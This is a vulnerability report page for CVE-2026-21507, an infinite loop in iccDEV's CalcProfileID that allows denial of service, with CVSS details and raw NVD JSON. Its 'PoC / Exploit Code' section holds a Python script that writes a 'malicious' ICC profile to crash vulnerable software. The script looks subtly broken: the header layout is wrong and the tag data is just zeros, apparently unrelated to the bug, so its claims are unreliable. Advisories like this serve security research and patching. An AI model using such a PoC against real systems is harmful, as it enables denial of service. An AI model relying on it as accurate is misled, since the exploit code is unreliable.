Security Vulnerability Report
中文
CVE-2026-21507 CVSS 7.5 HIGH

CVE-2026-21507

Published: 2026-01-06 01:16:02
Last Modified: 2026-01-12 21:04:26
Source: [email protected]

Description

iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have an infinite loop in the IccProfile.cpp function, CalcProfileID. This issue is fixed in version 2.3.1.1.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV <= 2.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-21507 PoC - iccDEV IccProfile.cpp CalcProfileID Infinite Loop This PoC generates a malicious ICC profile that triggers infinite loop in CalcProfileID function. """ import struct import os def create_malicious_icc_profile(): """ Create a malformed ICC profile that triggers infinite loop in CalcProfileID The vulnerability is in the CalcProfileID function in IccProfile.cpp """ # ICC Profile Header (128 bytes) profile_size = 1024 # Arbitrary size magic = b'acsp' # ICC profile magic number preferred_cmm_type = b'MSFT' profile_version = struct.pack('>I', 0x04000000) # Version 4.0 device_class = b'scn ' # Input device color_space = b'RGB ' pcs = b'Lab ' creation_date = struct.pack('>IIIIII', 2026, 1, 6, 0, 0, 0) platform = b'MSFT' flags = struct.pack('>I', 0) manufacturer = b'MSFT' model = b'MDL1' attributes = struct.pack('>Q', 0) rendering_intent = struct.pack('>I', 0) pcs_illuminant = struct.pack('>III', 0x00000000, 0x00000000, 0x00000000) creator = b'MSFT' profile_id = bytes(16) # 16 bytes profile ID header = magic + preferred_cmm_type + profile_version + device_class header += color_space + pcs + creation_date + platform + flags header += manufacturer + model + attributes + rendering_intent header += pcs_illuminant + creator + profile_id # Tag table with malicious entries # This malformed tag table can trigger infinite loop in CalcProfileID tag_count = 1 tag_offset = 128 + 4 + tag_count * 12 # Header + count + tags tag_signature = b'desc' # Profile description tag tag_data_offset = tag_offset + 128 # Data offset tag_data_size = 128 # Data size tag_table = struct.pack('>I', tag_count) tag_table += struct.pack('>I', int.from_bytes(tag_signature, 'big')) tag_table += struct.pack('>I', tag_data_offset) tag_table += struct.pack('>I', tag_data_size) # Malformed tag data that triggers the vulnerability # This creates data that causes CalcProfileID to loop infinitely malformed_data = b'\x00' * 128 # Combine all parts profile = header + tag_table + malformed_data return profile def main(): """ Main function to generate and save the PoC ICC profile """ print("[*] Generating CVE-2026-21507 PoC ICC Profile") print("[*] Target: iccDEV <= 2.3.1") print("[*] Vulnerability: Infinite Loop in IccProfile.cpp CalcProfileID()") # Generate malicious profile malicious_profile = create_malicious_icc_profile() # Save to file output_file = "CVE-2026-21507-malicious.icc" with open(output_file, 'wb') as f: f.write(malicious_profile) print(f"[+] Malicious ICC profile saved to: {output_file}") print(f"[+] File size: {len(malicious_profile)} bytes") print("[+] To trigger the vulnerability, load this profile using vulnerable iccDEV version") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21507", "sourceIdentifier": "[email protected]", "published": "2026-01-06T01:16:01.917", "lastModified": "2026-01-12T21:04:26.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1 and below have an infinite loop in the IccProfile.cpp function, CalcProfileID. This issue is fixed in version 2.3.1.1."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Las versiones 2.3.1 e inferiores tienen un bucle infinito en la función CalcProfileID de IccProfile.cpp. Este problema está corregido en la versión 2.3.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.1", "matchCriteriaId": "0E50DFFC-9185-4969-85A7-6D3976699720"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/3f3ce789d0d2b608c194ed172fa38943519dc198", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/244", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-hgp5-r8m9-8qpj", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.